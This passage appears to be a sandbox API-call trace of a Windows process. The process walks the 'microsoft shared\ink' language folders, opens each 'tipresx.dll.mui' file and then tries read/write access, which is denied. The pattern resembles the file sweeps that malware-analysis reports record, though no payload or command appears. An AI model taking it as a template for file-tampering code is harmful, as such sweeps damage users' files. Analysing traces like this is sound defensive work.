lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0082.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0082.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0082.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0082.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0082.923] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0082.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0082.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0082.923] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x782d0 [0083.076] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0635c03, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.076] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e126ecb, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e126ecb, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e126ecb, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0083.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0083.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.077] AreFileApisANSI () returned 1 [0083.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0083.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0083.078] AreFileApisANSI () returned 1 [0083.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0083.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui") returned 73 [0083.078] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.079] GetFileType (hFile=0x42c) returned 0x1 [0083.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0083.079] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.079] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.079] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.079] CloseHandle (hObject=0x42c) returned 1 [0083.080] AreFileApisANSI () returned 1 [0083.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0083.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui") returned 73 [0083.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.080] GetLastError () returned 0x5 [0083.080] GetLastError () returned 0x5 [0083.080] SetLastError (dwErrCode=0x5) [0083.080] GetLastError () returned 0x5 [0083.080] SetLastError (dwErrCode=0x5) [0083.080] GetLastError () returned 0x5 [0083.080] SetLastError (dwErrCode=0x5) [0083.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0083.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0083.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.080] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.080] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Ⰰ")) returned 0 [0083.080] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0083.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0083.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0083.081] AreFileApisANSI () returned 1 [0083.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR", lpUsedDefaultChar=0x0) returned 57 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.081] AreFileApisANSI () returned 1 [0083.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0083.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0083.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 57 [0083.082] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.082] GetLastError () returned 0x5 [0083.082] GetLastError () returned 0x5 [0083.082] SetLastError (dwErrCode=0x5) [0083.082] GetLastError () returned 0x5 [0083.082] SetLastError (dwErrCode=0x5) [0083.082] GetLastError () returned 0x5 [0083.082] SetLastError (dwErrCode=0x5) [0083.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0083.082] AreFileApisANSI () returned 1 [0083.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0083.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0083.082] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR") returned 57 [0083.082] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.082] GetLastError () returned 0x5 [0083.082] GetLastError () returned 0x5 [0083.082] SetLastError (dwErrCode=0x5) [0083.082] GetLastError () returned 0x5 [0083.082] SetLastError (dwErrCode=0x5) [0083.082] GetLastError () returned 0x5 [0083.082] SetLastError (dwErrCode=0x5) [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.083] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0083.083] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0083.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0083.083] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x785d0 [0083.083] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.084] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 